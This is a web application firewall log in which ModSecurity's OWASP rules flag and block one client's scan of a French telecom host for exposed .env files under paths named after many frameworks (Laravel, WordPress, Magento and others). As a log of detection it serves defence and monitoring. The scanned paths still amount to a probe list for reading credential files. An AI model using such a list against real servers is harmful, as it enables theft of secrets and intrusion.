[Mon May 11 16:41:40.374111 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCUgAAAQo"]
[Mon May 11 16:41:40.374611 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCUgAAAQo"]
[Mon May 11 16:41:40.374848 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCUgAAAQo"]
[Mon May 11 16:41:40.553762 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCUwAAAQo"]
[Mon May 11 16:41:40.554294 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCUwAAAQo"]
[Mon May 11 16:41:40.554543 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/laravel/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCUwAAAQo"]
[Mon May 11 16:41:40.717578 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCVAAAAQo"]
[Mon May 11 16:41:40.718247 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCVAAAAQo"]
[Mon May 11 16:41:40.718505 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/symfony/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCVAAAAQo"]
[Mon May 11 16:41:40.885961 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCVQAAAQo"]
[Mon May 11 16:41:40.886471 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCVQAAAQo"]
[Mon May 11 16:41:40.886733 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wordpress/.env"] [unique_id "agHqpEWKUxpmnkK7zHyCVQAAAQo"]
[Mon May 11 16:41:41.236705 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCVgAAAQo"]
[Mon May 11 16:41:41.237224 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCVgAAAQo"]
[Mon May 11 16:41:41.237487 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/wp/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCVgAAAQo"]
[Mon May 11 16:41:41.400666 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCVwAAAQo"]
[Mon May 11 16:41:41.401201 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCVwAAAQo"]
[Mon May 11 16:41:41.401437 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCVwAAAQo"]
[Mon May 11 16:41:41.573130 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCWQAAAQo"]
[Mon May 11 16:41:41.573631 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCWQAAAQo"]
[Mon May 11 16:41:41.573856 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/drupal/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCWQAAAQo"]
[Mon May 11 16:41:41.846618 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCWgAAAQo"]
[Mon May 11 16:41:41.847109 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCWgAAAQo"]
[Mon May 11 16:41:41.847339 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/joomla/.env"] [unique_id "agHqpUWKUxpmnkK7zHyCWgAAAQo"]
[Mon May 11 16:41:42.020127 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCWwAAAQo"]
[Mon May 11 16:41:42.020609 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCWwAAAQo"]
[Mon May 11 16:41:42.020817 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/magento/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCWwAAAQo"]
[Mon May 11 16:41:42.224560 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXAAAAQo"]
[Mon May 11 16:41:42.225046 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXAAAAQo"]
[Mon May 11 16:41:42.225298 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/shopify/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXAAAAQo"]
[Mon May 11 16:41:42.391113 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXQAAAQo"]
[Mon May 11 16:41:42.391822 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXQAAAQo"]
[Mon May 11 16:41:42.392072 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXQAAAQo"]
[Mon May 11 16:41:42.571261 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXwAAAQo"]
[Mon May 11 16:41:42.571745 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXwAAAQo"]
[Mon May 11 16:41:42.571982 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCXwAAAQo"]
[Mon May 11 16:41:42.735657 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCYAAAAQo"]
[Mon May 11 16:41:42.736166 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCYAAAAQo"]
[Mon May 11 16:41:42.736392 2026] [security2:error] [pid 1411055:tid 1411067] [client 16.148.67.252:55214] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agHqpkWKUxpmnkK7zHyCYAAAAQo"]
